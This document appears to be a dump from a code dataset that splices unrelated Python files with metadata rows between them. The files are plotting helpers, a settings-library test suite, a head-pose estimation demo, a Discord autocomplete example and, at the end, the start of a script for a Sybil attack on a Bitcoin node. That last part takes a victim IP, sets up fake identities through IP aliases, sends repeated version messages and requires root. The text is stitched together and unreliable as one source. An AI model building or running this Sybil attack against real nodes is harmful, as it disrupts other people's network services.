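#   fig = LinesPlotter(data, kind='lines').plot(title='Two lines', legend=True)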
class HistPlotter(GeneralPlotter):
"""A class used for histogram plotting"""
def __init__(self, data, axis=None, options={}, **kwargs):
super().__init__(data=data, axis=axis, **kwargs)
self.kind = 'histogram'
self.x = data.get('x')
self.bins = data.get('bins', None)
self.range = data.get('range', None)
self.density = data.get('density', False)
self.weights = data.get('weights', None)
self.cumulative = data.get('cumulative', False)
self.bottom = data.get('bottom', None)
self.histtype = data.get('histtype', 'bar')
self.align = data.get('align', 'mid')
self.orientation = data.get('orientation', 'vertical')
self.rwidth = data.get('rwidth', None)
self.log = data.get('log', False)
self.color = data.get('color', None)
self.alpha = data.get('alpha', None)
self.label = data.get('label', None)
self.stacked = data.get('stacked', False)
self.data = data.get('data', None)
def plot(self, **kwargs):
histPlot = self.axis.hist(self.x, bins=self.bins, range=self.range, density=self.density, weights=self.weights, cumulative=self.cumulative, bottom=self.bottom, histtype=self.histtype, align=self.align, orientation=self.orientation, rwidth=self.rwidth, log=self.log, color=self.color, alpha=self.alpha, label=self.label, stacked=self.stacked, data=self.data)
self.finishAxis(**kwargs)
return self.fig
class ImagePlotter(GeneralPlotter):
"""A class used for image plotting using plt.imshow"""
    def __init__(self, data, axis=None, options=None, **kwargs):
super().__init__(data=data, axis=axis, **kwargs)
self.kind = 'image'
self.X = data.get('X')
self.cmap = data.get('cmap', None)
self.norm = data.get('norm', None)
self.aspect = data.get('aspect', None)
self.interpolation = data.get('interpolation', None)
self.alpha = data.get('alpha', None)
self.vmin = data.get('vmin', None)
self.vmax = data.get('vmax', None)
self.origin = data.get('origin', None)
self.extent = data.get('extent', None)
self.filternorm = data.get('filternorm', True)
self.filterrad = data.get('filterrad', 4.0)
self.resample = data.get('resample', None)
self.url = data.get('url', None)
self.data = data.get('data', None)
def plot(self, **kwargs):
imagePlot = self.axis.imshow(self.X, cmap=self.cmap, norm=self.norm, aspect=self.aspect, interpolation=self.interpolation, alpha=self.alpha, vmin=self.vmin, vmax=self.vmax, origin=self.origin, extent=self.extent, filternorm=self.filternorm, filterrad=self.filterrad, resample=self.resample, url=self.url, data=self.data)
self.finishAxis(**kwargs)
return self.fig
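# --- Usage sketch (editor's addition, left commented out: GeneralPlotter and
# finishAxis() are defined earlier in this module and their exact options are
# not shown here). Each plotter above takes a plain data dict and draws onto
# its axis when plot() is called, e.g.:
#
#     data = {'x': [0, 1, 2, 3], 'y': [0, 1, 4, 9], 'color': 'k', 'marker': 'o'}
#     fig = LinePlotter(data).plot()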
class AnchoredScaleBar(AnchoredOffsetbox):
"""
A class used for adding scale bars to plots
"""
def __init__(self, axis, sizex=0, sizey=0, labelx=None, labely=None, loc=4, pad=0.1, borderpad=0.1, sep=2, prop=None, barcolor="black", barwidth=None, **kwargs):
"""
        Draw a horizontal and/or vertical scale bar with sizes given in data
        coordinates of the given axis. A label is drawn underneath (center-aligned).
        - axis : the axis whose transData coordinate frame the bars use
        - sizex, sizey : width of the x/y bar, in data units; 0 to omit
        - labelx, labely : labels for the x/y bars; None to omit
        - loc : position within the containing axes
        - pad, borderpad : padding, in fractions of the legend font size (or prop)
        - sep : separation between labels and bars, in points
        - **kwargs : additional arguments passed to the base class constructor
"""
from matplotlib.patches import Rectangle
from matplotlib.offsetbox import AuxTransformBox, VPacker, HPacker, TextArea, DrawingArea
bars = AuxTransformBox(axis.transData)
if sizex:
if axis.xaxis_inverted():
sizex = -sizex
bars.add_artist(Rectangle((0,0), sizex, 0, ec=barcolor, lw=barwidth, fc="none"))
if sizey:
if axis.yaxis_inverted():
sizey = -sizey
bars.add_artist(Rectangle((0,0), 0, sizey, ec=barcolor, lw=barwidth, fc="none"))
if sizex and labelx:
self.xlabel = TextArea(labelx)
bars = VPacker(children=[bars, self.xlabel], align="center", pad=0, sep=sep)
if sizey and labely:
self.ylabel = TextArea(labely)
bars = HPacker(children=[self.ylabel, bars], align="center", pad=0, sep=sep)
AnchoredOffsetbox.__init__(self, loc, pad=pad, borderpad=borderpad, child=bars, prop=prop, frameon=False, **kwargs)
def add_scalebar(axis, matchx=True, matchy=True, hidex=True, hidey=True, unitsx=None, unitsy=None, scalex=1.0, scaley=1.0, xmax=None, ymax=None, space=None, **kwargs):
"""
    Add scale bars to an axis.
    Adds a set of scale bars to *axis*, matching their size to the tick spacing,
    and optionally hides the x and y axes.
    - axis : the axis to attach the scale bars to
    - matchx, matchy : if True, set bar size to the spacing between ticks;
      if False, sizes must be supplied via the sizex/sizey keyword arguments
    - hidex, hidey : if True, hide the x-axis / y-axis of the parent
    - **kwargs : additional arguments passed to AnchoredScaleBar
    Returns the created scalebar object.
"""
def get_tick_size(subaxis):
tick_size = None
tick_locs = subaxis.get_majorticklocs()
if len(tick_locs)>1:
tick_size = np.abs(tick_locs[1] - tick_locs[0])
return tick_size
    # Start from None so a NameError cannot occur when matchx/matchy is False
    sizex = sizey = None
    if matchx:
        sizex = get_tick_size(axis.xaxis)
    if matchy:
        sizey = get_tick_size(axis.yaxis)
    # Explicit sizes (required when match* is False) override tick-derived ones
    sizex = kwargs.get('sizex', sizex)
    sizey = kwargs.get('sizey', sizey)
    def autosize(value, maxvalue, scale, n=1, m=10):
        # Round to n significant figures, then up to the nearest multiple of m,
        # so the scale bar gets a "nice" round length
        round_to_n = lambda value, n, m: int(np.ceil(round(value, -int(np.floor(np.log10(abs(value)))) + (n - 1)) / m)) * m
        while value > maxvalue:
            try:
                value = round_to_n(0.8 * maxvalue * scale, n, m) / scale
            except Exception:
                value /= 10.0
                m /= 10.0
        return value
    if ymax is not None and sizey is not None and sizey > ymax:
        sizey = autosize(sizey, ymax, scaley)
    if xmax is not None and sizex is not None and sizex > xmax:
        sizex = autosize(sizex, xmax, scalex)
    kwargs['sizex'] = sizex if sizex is not None else 0
    kwargs['sizey'] = sizey if sizey is not None else 0
if unitsx is None:
unitsx = ''
if unitsy is None:
unitsy = ''
if 'labelx' not in kwargs or kwargs['labelx'] is None:
kwargs['labelx'] = '%.3g %s'%(kwargs['sizex'] * scalex, unitsx)
if 'labely' not in kwargs or kwargs['labely'] is None:
kwargs['labely'] = '%.3g %s'%(kwargs['sizey'] * scaley, unitsy)
# add space for scalebar
if space is not None:
ylim0, ylim1 = axis.get_ylim()
ylim = (ylim0 - space, ylim1)
if ylim0 > ylim1: # if y axis is inverted
ylim = (ylim0 + space, ylim1)
axis.set_ylim(ylim)
scalebar = AnchoredScaleBar(axis, **kwargs)
axis.add_artist(scalebar)
if hidex:
axis.xaxis.set_visible(False)
if hidey:
axis.yaxis.set_visible(False)
if hidex and hidey:
axis.set_frame_on(False)
return scalebar
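# --- Usage sketch (editor's addition): a minimal, hedged demo of the helpers
# above. It assumes only numpy (already imported in this module as np) and
# matplotlib; run the file directly to preview the scale bars.
if __name__ == '__main__':
    import matplotlib.pyplot as plt
    fig, ax = plt.subplots()
    t = np.linspace(0, 2 * np.pi, 200)
    ax.plot(t, np.sin(t))
    # Match the bar sizes to the tick spacing and hide the parent axes
    add_scalebar(ax, unitsx='s', unitsy='mV')
    plt.show()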
| 34.535552
| 376
| 0.56987
| 2,724
| 22,828
| 4.728708
| 0.168502
| 0.032063
| 0.010092
| 0.014906
| 0.231892
| 0.180731
| 0.134462
| 0.11482
| 0.110318
| 0.110318
| 0
| 0.013848
| 0.307254
| 22,828
| 660
| 377
| 34.587879
| 0.800683
| 0.114027
| 0
| 0.22488
| 0
| 0
| 0.063341
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.064593
| false
| 0
| 0.033493
| 0
| 0.138756
| 0.002392
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c5b215bf00e243da89ca4e94c55e9e94a7ff44a
| 9,885
|
py
|
Python
|
tests/test_app_settings_dict.py
|
wheelercj/app_settings
|
06224dec0b5baf1eeb92e5a81ca4e8385d4942a6
|
[
"MIT"
] | null | null | null |
tests/test_app_settings_dict.py
|
wheelercj/app_settings
|
06224dec0b5baf1eeb92e5a81ca4e8385d4942a6
|
[
"MIT"
] | null | null | null |
tests/test_app_settings_dict.py
|
wheelercj/app_settings
|
06224dec0b5baf1eeb92e5a81ca4e8385d4942a6
|
[
"MIT"
] | null | null | null |
import pytest
import re
from typing import Any, Tuple
from dataclasses import dataclass
from app_settings_dict import Settings
def test_simple_settings() -> None:
settings = Settings(
settings_file_path="C:/Users/chris/Documents/sample_settings_file_name.json",
default_factories={
"key1": lambda: "value1",
},
data={
"key1": "hello",
"key2": "world",
},
)
assert settings["key1"] == "hello"
assert settings["key2"] == "world"
del settings["key1"]
del settings["key2"]
assert "key1" not in settings
assert "key2" not in settings
assert settings["key1"] == "value1"
with pytest.raises(KeyError):
settings["key2"]
def test_default_settings() -> None:
settings = Settings(
settings_file_path="sample settings file name.json",
default_factories={
"key1": lambda: "value1",
"key2": lambda: "value2",
"key3": lambda: "value3",
},
default_settings={
"key3": [],
},
data={
"key1": "hello",
"key2": "world",
},
)
assert settings["key1"] == "hello"
assert settings["key2"] == "world"
assert settings["key3"] == "value3"
del settings["key3"]
assert settings["key3"] == "value3"
settings.reset("key3")
assert settings["key3"] == []
settings["key3"] = "something"
assert settings["key3"] == "something"
settings.reset_all()
assert settings["key1"] == "hello"
assert settings["key2"] == "world"
assert settings["key3"] == []
def test_load_without_file() -> None:
def sample_prompt_function(settings: Settings) -> Settings:
# s = input("Enter the settings: ")
return settings.update({"key1": "a", "key2": "b"})
settings = Settings(
settings_file_path="not a real file.yaml",
prompt_user_for_all_settings=sample_prompt_function,
default_factories={
"key1": lambda: "value1",
"key2": lambda: "value2",
"key3": lambda: "value3",
},
default_settings={
"key3": [],
"key4": "value4",
},
data={
"key1": "hello",
"key2": "world",
},
)
assert settings["key1"] == "hello"
assert settings["key2"] == "world"
assert settings["key3"] == "value3"
settings.load(fallback_option="prompt user")
assert settings["key1"] == "a"
assert settings["key2"] == "b"
assert settings["key3"] == "value3"
with pytest.raises(KeyError):
settings["key4"]
settings.load(fallback_option="default settings")
assert settings["key1"] == "a"
assert settings["key2"] == "b"
assert settings["key3"] == "value3"
assert settings["key4"] == "value4"
settings.clear()
settings.load(fallback_option="default settings")
assert settings["key1"] == "hello"
assert settings["key2"] == "world"
assert settings["key3"] == []
assert settings["key4"] == "value4"
with pytest.raises(ValueError):
settings.load(fallback_option="invalid option")
def test_load_after_empty() -> None:
settings = Settings(
settings_file_path="sample settings file name.json",
        prompt_user_for_all_settings=lambda: 1 / 0,  # deliberately fails if ever called
default_factories={
"key1": lambda: "value1",
},
default_settings={
"key1": [],
},
data={
"key1": "hello",
},
)
assert settings["key1"] == "hello"
settings.clear()
assert settings["key1"] == "value1"
def test_prompt() -> None:
def sample_prompt_function() -> Any:
# s = input("Enter a setting: ")
return "a"
settings = Settings(
settings_file_path="sample settings file name.json",
prompt_user_for_all_settings=lambda: {"key1": "a", "key2": "b"},
default_factories={
"key1": sample_prompt_function,
"key2": lambda: "value2",
"key3": lambda: "value3",
},
default_settings={
"key3": [],
},
data={
"key1": "hello",
"key2": "world",
},
)
assert settings["key1"] == "hello"
settings.prompt("key1")
assert settings["key1"] == "a"
def test_changing_settings_before_load() -> None:
settings = Settings(
settings_file_path="sample settings file name.json",
default_factories={
"key1": lambda: "value1",
},
default_settings={
"key1": [],
},
data={
"key1": "hello",
},
)
assert settings["key1"] == "hello"
settings.load(fallback_option="default settings")
assert settings["key1"] == "hello"
settings["key1"] = "a"
settings.load(fallback_option="default settings")
assert settings["key1"] == "a"
def test_update() -> None:
settings = Settings(
settings_file_path="sample settings file name.json",
default_factories={
"key1": lambda: "value1",
},
default_settings={
"key1": [],
},
data={
"key1": "hello",
},
)
assert settings["key1"] == "hello"
settings.update({"key1": "a"})
assert settings["key1"] == "a"
settings.update({"key2": "b"})
assert settings["key2"] == "b"
def test_Settings__is_using_json() -> None:
settings = Settings(
settings_file_path="sample_settings_file_name.json",
default_factories={
"key1": lambda: "value1",
},
data={
"key1": "hello",
"key2": "world",
},
)
assert settings._Settings__is_using_json()
settings.settings_file_path = "sample_settings_file_name.yaml"
assert not settings._Settings__is_using_json()
def test_load_from_dict() -> None:
settings = Settings()
settings.load_from_dict(
{
"key1": "hello",
"key2": "world",
}
)
assert len(settings.data) == 0
settings = Settings(
data={
"key1": "a",
"key2": "b",
}
)
settings.load_from_dict(
{
"key1": "c",
"key2": "d",
}
)
assert settings.data["key1"] == "c"
assert settings.data["key2"] == "d"
def test_dump_to_dict() -> None:
settings = Settings(
settings_file_path="sample_settings_file_name.json",
data={
"key1": "hello",
"key2": "world",
},
)
assert settings.dump_to_dict() == {
"key1": "hello",
"key2": "world",
}
def test_nested_Settings() -> None:
settings = Settings(
settings_file_path="sample_settings_file_name.json",
default_settings={
"key6": [],
"key7": Settings(
data={
"key8": "value8",
}
),
},
data={
"key1": "hello",
"key2": "world",
"key3": "value3",
"key4": Settings(
settings_file_path="why would anyone want an inner file though.yaml",
data={
"key5": "value5",
},
),
},
)
assert settings.dump_to_dict() == {
"key1": "hello",
"key2": "world",
"key3": "value3",
"key4": {
"key5": "value5",
},
}
def test_creating_setting_after_init() -> None:
settings = Settings(
settings_file_path="sample_settings_file_name.json",
default_settings={
"key1": [],
"key2": "value2",
},
)
with pytest.raises(KeyError):
settings["key3"] = "value3"
def test_prompt_error() -> None:
settings = Settings(
settings_file_path="nonexistent file.json",
default_settings={
"key1": [],
"key2": "value2",
},
)
with pytest.raises(ValueError):
settings.load(fallback_option="prompt user")
def test_nested_setting_loaders_and_dumpers() -> None:
@dataclass
class Coords:
x: int
y: int
def __init__(self, x_and_y: Tuple[int, int]) -> None:
self.x = x_and_y[0]
self.y = x_and_y[1]
settings = Settings(
setting_loader=Coords,
setting_dumper=lambda obj: (obj.x, obj.y),
data={
"location 1": Coords(x_and_y=(1, 2)),
"location 2": Coords(x_and_y=(3, 4)),
"patterns": Settings(
setting_loader=re.compile,
setting_dumper=lambda x: x.pattern,
data={
"phone number pattern": re.compile(r"\d{3}-?\d{3}-?\d{4}"),
"email address pattern": re.compile(
r"[\w\d.+-]+@[\w\d.-]+\.[\w\d]+"
),
},
),
},
)
settings_dict = settings.dump_to_dict()
assert settings_dict["location 1"] == (1, 2)
assert settings_dict["location 2"] == (3, 4)
assert settings_dict["patterns"]["phone number pattern"] == r"\d{3}-?\d{3}-?\d{4}"
assert (
settings_dict["patterns"]["email address pattern"]
== r"[\w\d.+-]+@[\w\d.-]+\.[\w\d]+"
)
settings.load_from_dict(settings_dict)
assert settings["location 1"] == Coords(x_and_y=(1, 2))
assert settings["location 2"] == Coords(x_and_y=(3, 4))
assert settings["patterns"]["phone number pattern"] == re.compile(
r"\d{3}-?\d{3}-?\d{4}"
)
assert settings["patterns"]["email address pattern"] == re.compile(
r"[\w\d.+-]+@[\w\d.-]+\.[\w\d]+"
)
def test_init_without_keywords() -> None:
with pytest.raises(TypeError):
Settings("sample settings file path.json")
| 27.84507
| 86
| 0.527466
| 996
| 9,885
| 5.048193
| 0.128514
| 0.136436
| 0.060859
| 0.066826
| 0.65354
| 0.565434
| 0.542562
| 0.520286
| 0.471559
| 0.43218
| 0
| 0.026588
| 0.315124
| 9,885
| 354
| 87
| 27.923729
| 0.7161
| 0.006474
| 0
| 0.512579
| 0
| 0
| 0.185781
| 0.029741
| 0
| 0
| 0
| 0
| 0.166667
| 1
| 0.056604
| false
| 0
| 0.015723
| 0.006289
| 0.08805
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c5b696f9bc64bbbc8bda141e564e9a8de0891a8
| 5,910
|
py
|
Python
|
demo/demo_FSANET_ssd.py
|
jacke121/FSA-Net
|
c4d60bd38e9d17b0ea33d824ec443a01bdeba015
|
[
"Apache-2.0"
] | null | null | null |
demo/demo_FSANET_ssd.py
|
jacke121/FSA-Net
|
c4d60bd38e9d17b0ea33d824ec443a01bdeba015
|
[
"Apache-2.0"
] | null | null | null |
demo/demo_FSANET_ssd.py
|
jacke121/FSA-Net
|
c4d60bd38e9d17b0ea33d824ec443a01bdeba015
|
[
"Apache-2.0"
] | null | null | null |
import os
import time
import cv2
import sys
sys.path.append('..')
import numpy as np
from math import cos, sin
from lib.FSANET_model import *
import numpy as np
from keras.layers import Average
def draw_axis(img, yaw, pitch, roll, tdx=None, tdy=None, size=50):
    print(yaw, roll, pitch)  # debug: predicted pose angles, in degrees
    # Convert degrees to radians (yaw is negated to match the image axes)
    pitch = pitch * np.pi / 180
    yaw = -(yaw * np.pi / 180)
    roll = roll * np.pi / 180
    # Default the axis origin to the image center when not supplied
    if tdx is None or tdy is None:
        height, width = img.shape[:2]
        tdx = width / 2
        tdy = height / 2
# X-Axis pointing to right. drawn in red
x1 = size * (cos(yaw) * cos(roll)) + tdx
y1 = size * (cos(pitch) * sin(roll) + cos(roll) * sin(pitch) * sin(yaw)) + tdy
# Y-Axis | drawn in green
# v
x2 = size * (-cos(yaw) * sin(roll)) + tdx
y2 = size * (cos(pitch) * cos(roll) - sin(pitch) * sin(yaw) * sin(roll)) + tdy
# Z-Axis (out of the screen) drawn in blue
x3 = size * (sin(yaw)) + tdx
y3 = size * (-cos(yaw) * sin(pitch)) + tdy
cv2.line(img, (int(tdx), int(tdy)), (int(x1),int(y1)),(0,0,255),3)
cv2.line(img, (int(tdx), int(tdy)), (int(x2),int(y2)),(0,255,0),3)
cv2.line(img, (int(tdx), int(tdy)), (int(x3),int(y3)),(255,0,0),2)
return img
def draw_results_ssd(detected,input_img,faces,ad,img_size,img_w,img_h,model):
# loop over the detections
if detected.shape[2]>0:
for i in range(0, detected.shape[2]):
# extract the confidence (i.e., probability) associated with the
# prediction
confidence = detected[0, 0, i, 2]
# filter out weak detections
if confidence > 0.5:
# compute the (x, y)-coordinates of the bounding box for
# the face and extract the face ROI
(h0, w0) = input_img.shape[:2]
box = detected[0, 0, i, 3:7] * np.array([w0, h0, w0, h0])
(startX, startY, endX, endY) = box.astype("int")
# print((startX, startY, endX, endY))
x1 = startX
y1 = startY
w = endX - startX
h = endY - startY
x2 = x1+w
y2 = y1+h
xw1 = max(int(x1 - ad * w), 0)
yw1 = max(int(y1 - ad * h), 0)
xw2 = min(int(x2 + ad * w), img_w - 1)
yw2 = min(int(y2 + ad * h), img_h - 1)
cv2.rectangle(input_img, (xw1,yw1), (xw2,yw2), (0, 0, 255), 2)
start=time.time()
faces[i,:,:,:] = cv2.resize(input_img[yw1:yw2 + 1, xw1:xw2 + 1, :], (img_size, img_size))
faces[i,:,:,:] = cv2.normalize(faces[i,:,:,:], None, alpha=0, beta=255, norm_type=cv2.NORM_MINMAX)
face = np.expand_dims(faces[i,:,:,:], axis=0)
p_result = model.predict(face)
                print('direction (fangxiang) inference time:', time.time() - start)
face = face.squeeze()
img = draw_axis(input_img[yw1:yw2 + 1, xw1:xw2 + 1, :], p_result[0][0], p_result[0][1], p_result[0][2])
input_img[yw1:yw2 + 1, xw1:xw2 + 1, :] = img
return input_img
def main():
os.makedirs('./img',exist_ok=True)
img_size = 64
img_idx = 0
ad = 0.6
#Parameters
num_capsule = 3
dim_capsule = 16
routings = 2
stage_num = [3,3,3]
lambda_d = 1
num_classes = 3
image_size = 64
num_primcaps = 7*3
m_dim = 5
S_set = [num_capsule, dim_capsule, routings, num_primcaps, m_dim]
model1 = FSA_net_Capsule(image_size, num_classes, stage_num, lambda_d, S_set)()
model2 = FSA_net_Var_Capsule(image_size, num_classes, stage_num, lambda_d, S_set)()
num_primcaps = 8*8*3
S_set = [num_capsule, dim_capsule, routings, num_primcaps, m_dim]
model3 = FSA_net_noS_Capsule(image_size, num_classes, stage_num, lambda_d, S_set)()
weight_file1 = '../pre-trained/300W_LP_models/fsanet_capsule_3_16_2_21_5/fsanet_capsule_3_16_2_21_5.h5'
model1.load_weights(weight_file1)
print('Finished loading model 1.')
weight_file2 = '../pre-trained/300W_LP_models/fsanet_var_capsule_3_16_2_21_5/fsanet_var_capsule_3_16_2_21_5.h5'
weight_file3 = '../pre-trained/300W_LP_models/fsanet_noS_capsule_3_16_2_192_5/fsanet_noS_capsule_3_16_2_192_5.h5'
model2.load_weights(weight_file2)
print('Finished loading model 2.')
model3.load_weights(weight_file3)
print('Finished loading model 3.')
inputs = Input(shape=(64,64,3))
x1 = model1(inputs) #1x1
x2 = model2(inputs) #var
x3 = model3(inputs) #w/o
avg_model = Average()([x1,x2,x3])
model = Model(inputs=inputs, outputs=avg_model)
# load our serialized face detector from disk
print("[INFO] loading face detector...")
protoPath = os.path.sep.join(["face_detector", "deploy.prototxt"])
modelPath = os.path.sep.join(["face_detector",
"res10_300x300_ssd_iter_140000.caffemodel"])
net = cv2.dnn.readNetFromCaffe(protoPath, modelPath)
# capture video
cap = cv2.VideoCapture(0)
# cap.set(cv2.CAP_PROP_FRAME_WIDTH, 1024*1)
# cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 768*1)
while True:
# get video frame
ret, input_img = cap.read()
img_idx = img_idx + 1
img_h, img_w, _ = np.shape(input_img)
blob = cv2.dnn.blobFromImage(cv2.resize(input_img, (300, 300)), 1.0,
(300, 300), (104.0, 177.0, 123.0))
net.setInput(blob)
detected = net.forward()
faces = np.empty((detected.shape[2], img_size, img_size, 3))
input_img = draw_results_ssd(detected,input_img,faces,ad,img_size,img_w,img_h,model)
# cv2.imwrite('img/'+str(img_idx)+'.png',input_img)
cv2.imshow("result", input_img)
        key = cv2.waitKey(1)
        if key == 27:  # Esc exits the capture loop
            break
if __name__ == '__main__':
main()
| 34.16185
| 122
| 0.577496
| 879
| 5,910
| 3.691695
| 0.261661
| 0.034515
| 0.01849
| 0.020339
| 0.267488
| 0.255778
| 0.194145
| 0.180586
| 0.137134
| 0.105701
| 0
| 0.070907
| 0.281726
| 5,910
| 172
| 123
| 34.360465
| 0.693522
| 0.099831
| 0
| 0.034483
| 0
| 0
| 0.09362
| 0.059645
| 0
| 0
| 0
| 0
| 0
| 1
| 0.025862
| false
| 0
| 0.077586
| 0
| 0.12069
| 0.051724
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c5b93a68b2014eb34642b9dabeaf09a9053d01e
| 5,118
|
py
|
Python
|
examples/app_commands/slash_autocomplete.py
|
Mihitoko/pycord
|
137c1474eed5fb4273e542bd22ad76764a8712fc
|
[
"MIT"
] | null | null | null |
examples/app_commands/slash_autocomplete.py
|
Mihitoko/pycord
|
137c1474eed5fb4273e542bd22ad76764a8712fc
|
[
"MIT"
] | null | null | null |
examples/app_commands/slash_autocomplete.py
|
Mihitoko/pycord
|
137c1474eed5fb4273e542bd22ad76764a8712fc
|
[
"MIT"
] | 1
|
2022-02-20T09:10:40.000Z
|
2022-02-20T09:10:40.000Z
|
import discord
from discord.commands import option
bot = discord.Bot(debug_guilds=[...])
COLORS = ["red", "orange", "yellow", "green", "blue", "indigo", "violet"]
LOTS_OF_COLORS = [
"aliceblue",
"antiquewhite",
"aqua",
"aquamarine",
"azure",
"beige",
"bisque",
"blueviolet",
"brown",
"burlywood",
"cadetblue",
"cornflowerblue",
"cornsilk",
"crimson",
"cyan",
"darkblue",
"deepskyblue",
"dimgray",
"dimgrey",
"dodgerblue",
"firebrick",
"floralwhite",
"forestgreen",
"fuchsia",
"gainsboro",
"ghostwhite",
"gold",
"goldenrod",
"gray",
"green",
"greenyellow",
"grey",
"honeydew",
"hotpink",
"indianred",
"indigo",
"ivory",
"khaki",
"lavender",
"lavenderblush",
"lawngreen",
"lightcoral",
"maroon",
"mediumaquamarine",
"mediumblue",
"mediumorchid",
"midnightblue",
"navajowhite",
"navy",
"oldlace",
"olive",
"olivedrab",
"orange",
"orangered",
"orchid",
"palegoldenrod",
"palegreen",
"plum",
"powderblue",
"purple",
"red",
"rosybrown",
"royalblue",
"saddlebrown",
"sienna",
"springgreen",
"steelblue",
"tan",
"teal",
"thistle",
"tomato",
"turquoise",
"violet",
"wheat",
"white",
"whitesmoke",
"yellow",
"yellowgreen",
]
BASIC_ALLOWED = [...] # This would normally be a list of discord user IDs for the purpose of this example
async def color_searcher(ctx: discord.AutocompleteContext):
"""
    Returns colors from the LOTS_OF_COLORS list, which discord.utils.basic_autocomplete then filters.
In this example, we've added logic to only display any results in the
returned list if the user's ID exists in the BASIC_ALLOWED list.
This is to demonstrate passing a callback in the discord.utils.basic_autocomplete function.
"""
return [color for color in LOTS_OF_COLORS if ctx.interaction.user.id in BASIC_ALLOWED]
async def get_colors(ctx: discord.AutocompleteContext):
"""Returns a list of colors that begin with the characters entered so far."""
return [color for color in COLORS if color.startswith(ctx.value.lower())]
async def get_animals(ctx: discord.AutocompleteContext):
"""Returns a list of animals that are (mostly) the color selected for the "color" option."""
picked_color = ctx.options["color"]
if picked_color == "red":
return ["cardinal", "ladybug"]
elif picked_color == "orange":
return ["clownfish", "tiger"]
elif picked_color == "yellow":
return ["goldfinch", "banana slug"]
elif picked_color == "green":
return ["tree frog", "python"]
elif picked_color == "blue":
return ["blue jay", "blue whale"]
elif picked_color == "indigo":
return ["eastern indigo snake"] # Needs to return an iterable even if only one item
elif picked_color == "violet":
return ["purple emperor butterfly", "orchid dottyback"]
else:
return ["rainbowfish"]
@bot.slash_command(name="ac_example")
@option("color", description="Pick a color!", autocomplete=get_colors)
@option("animal", description="Pick an animal!", autocomplete=get_animals)
async def autocomplete_example(
ctx: discord.ApplicationContext,
color: str,
animal: str,
):
"""
Demonstrates using ctx.options to create options
that are dependent on the values of other options.
For the `color` option, a callback is passed, where additional
logic can be added to determine which values are returned.
For the `animal` option, the callback uses the input
    from the color option to return an iterable of animals.
"""
await ctx.respond(f"You picked {color} for the color, which allowed you to choose {animal} for the animal.")
@bot.slash_command(name="ac_basic_example")
@option(
"color",
description="Pick a color from this big list!",
autocomplete=discord.utils.basic_autocomplete(color_searcher),
# Demonstrates passing a callback to discord.utils.basic_autocomplete
)
@option(
"animal",
description="Pick an animal from this small list",
autocomplete=discord.utils.basic_autocomplete(["snail", "python", "cricket", "orca"]),
# Demonstrates passing a static iterable discord.utils.basic_autocomplete
)
async def autocomplete_basic_example(
ctx: discord.ApplicationContext,
color: str,
animal: str,
):
"""
This demonstrates using the discord.utils.basic_autocomplete helper function.
For the `color` option, a callback is passed, where additional
logic can be added to determine which values are returned.
For the `animal` option, a static iterable is passed.
    While only a small number of values for `animal` are used in this example,
    iterables of any length can be passed to discord.utils.basic_autocomplete.
Note that the basic_autocomplete function itself will still only return a maximum of 25 items.
"""
await ctx.respond(f"You picked {color} as your color, and {animal} as your animal!")
bot.run("TOKEN")
| 27.079365
| 112
| 0.657679
| 604
| 5,118
| 5.506623
| 0.384106
| 0.033073
| 0.035779
| 0.061034
| 0.291942
| 0.228803
| 0.180698
| 0.100421
| 0.069152
| 0.069152
| 0
| 0.000503
| 0.223329
| 5,118
| 188
| 113
| 27.223404
| 0.836226
| 0.05295
| 0
| 0.074627
| 0
| 0.007463
| 0.338261
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.014925
| 0
| 0.089552
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c5bad7796ac5e7201e5d6fb5312abee3b503a5c
| 11,522
|
py
|
Python
|
tools/Networking/sybil_block_no_ban.py
|
simewu/bitcoin_researcher
|
b9fd2efdb8ae8467c5bd4b3320713a541635df16
|
[
"MIT"
] | 1
|
2020-02-15T21:44:04.000Z
|
2020-02-15T21:44:04.000Z
|
tools/Networking/sybil_block_no_ban.py
|
SimeoW/bitcoin
|
3644405f06c8b16a437513e8c02f0f061b91be2e
|
[
"MIT"
] | null | null | null |
tools/Networking/sybil_block_no_ban.py
|
SimeoW/bitcoin
|
3644405f06c8b16a437513e8c02f0f061b91be2e
|
[
"MIT"
] | null | null | null |
from _thread import start_new_thread
from bitcoin.messages import *
from bitcoin.net import CAddress
from bitcoin.core import CBlock
from io import BytesIO as _BytesIO
import atexit
import bitcoin
import fcntl
import hashlib
import json
import os
import random
import re
import socket
import struct
import sys
import time
import datetime
if os.geteuid() != 0:
sys.exit("\nYou need to have root privileges to run this script.\nPlease try again, this time using 'sudo'. Exiting.\n")
# Specify the attacker's genuine IP
attacker_ip = input('\nEnter attacker\'s IP address: ')
# Specify the victim's IP, and port (8333 for Bitcoin)
victim_ip = input('Enter victim\'s IP address: ')
victim_port = 8333
# How many identities should run simultaneously
num_identities = 8
# While attacking the victim, wait this many seconds before sending each version message
seconds_between_version_packets = 0.1
identity_interface = [] # Keeps the IP alias interface and IP for each successful connection
identity_address = [] # Keeps the IP and port for each successful connection
identity_socket = [] # Keeps the socket for each successful connection
# The file where the iptables backup is saved, then restored when the script ends
iptables_file_path = f'{os.path.abspath(os.getcwd())}/backup.iptables.rules'
